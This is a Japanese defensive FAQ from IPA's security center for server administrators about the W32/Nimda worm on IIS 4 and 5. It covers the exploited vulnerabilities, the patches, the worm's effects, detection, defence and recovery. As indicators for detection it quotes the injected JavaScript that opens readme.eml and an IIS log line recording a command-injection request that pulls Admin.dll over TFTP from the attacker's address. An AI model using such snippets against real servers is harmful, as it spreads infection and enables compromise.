HOME情報セキュリティサポート情報FAQ(よくある質問)W32/Nimda に関する FAQ [サーバー管理者向け]

本文を印刷する

情報セキュリティ

W32/Nimda に関する FAQ [サーバー管理者向け]

2011年 1月 5日

独立行政法人 情報処理推進機構
セキュリティセンター

Q1: 感染するサーバーの種類はなんですか。

Microsoft社のIIS4、IIS5に感染します。

Q2:感染に利用される脆弱性はどれですか。

「Web サーバー フォルダへの侵入」の脆弱性に対する対策 (MS00-078)
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078

「不要なデコーディング操作により IIS でコマンドが実行される」 (MS01-026)
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-026
です。

Q3:どのパッチをあれてばよいですか。

感染に利用される脆弱性は、上記 MS00-078 と MS01-026 ですが、 MS00-078 は MS01-026 に含まれ、さらに MS01-026 は MS01-044 「累積的な修正プログラム」
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-044
に含まれるため、MS01-044をあてれば対処できます。

Q4:感染するとどうなりますか。

  • W32/Nimdaがサーバーへの感染に成功するとTFTP(69/UDP)を使い感染元のサーバーからAdmin.dllというファイルをダウンロードします。
  • W32/Nimdaはネットワーク共有を含むディレクトリ・ツリーを全検索し、書き込み権限のあるディレクトリに".eml"もしくは".nws"拡張子のついた自身のコピーを作成します。また、検索によりHTMLファイル(.html、.htm、.asp拡張子のファイル)を発見した場合はそのディレクトリに"readme.eml"という名前の自身のコピーを作成し、アクセスしてきたクライアントに"readme.eml"をダウンロードさせるためのJavaScriptをそのサーバーに存在するHTMLファイル(.html、.htm、.asp拡張子のファ イル)内に埋め込みます。

例)
<script language-"Javascript">
window.open("readme.eml",null,"resizable=no,top=6000,left=6000")
</script>

  • W32/Nimdaは実行形式のファイルにトロイの木馬を仕掛けます。仕掛けられたファイルを実行するとまずW32/Nimdaのコードが実行されその後通常のアプリケーションとして起動されます。
  • W32/Nimdaはすべてのディレクトリを共有可能な設定とし、"Guest"ユーザを"Administrator"グループの有効なユーザとして設定します。
  • W32/Nimdaは、レジストリを書き換えます。

Q5:感染したかどうかを確かめる方法はありますか。

  • 疑いのあるWebサーバー上からアクセスできる、全てのディレクトリ上に不審な ".eml"、".nws" 拡張子のファイルがあるか確認する。
  • 疑いのあるWebサーバー上にあるHTMLファイル(.html、.htm、.asp拡張子のファイル)内に"readme.eml"ファイルを開かせるためのJavaScriptが埋め込まれていないか確認する。
  • IISのログ内にTFTP通信をした形跡がないか確認する。

例)/c+tftp%20-i%20xxx.xxx.xxx.xxx%20GET%20Admin.dll%20d:\Admin.dll
(xxx.xxx.xxx.xxxは攻撃元のIPアドレス)

Q6:どのようにして感染しますか。

Webサーバーへの感染ルートは3種類あります。
(1) 「Webサーバーフォルダへの侵入」の脆弱性(MS00-078) を利用
(2) 「不正なデコーディング操作によりIISでコマンドが実行」の脆弱性 (MS01-026) を利用
(3) Code Red II sadmind/IIS が残したバックドアを利用

Q7:検知方法を教えてください。

文字列を検知することで対応することが可能かもしれません。
また、Host-based intrusion detection systemであれば"readme.eml"ファイルの存在を検知できるかもしれません。

Q8:防御方法を教えてください。

Microsoft社から提供されているパッチを導入しましょう。
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-044

ただしこのパッチをあてただけではCode Red IIやSadmindにより開けられたバックドアは削除できないため、管理者はそれらに対する対策もうつ必要があるでしょう。

Q9:感染してしまった場合の修復方法を教えてください。

現在のところ完全かつ確実に修復する方法はないようです。
推奨する方法は、ネットワークから切り離し、ハードディスクをフォーマットし、OSやアプリケーショ ンを再インストールし、すべてのセキュリティ・パッチをインストールし、ネットワークにつなぎ直すことです。

  • ウイルス対策のトップページこちらをご覧ください。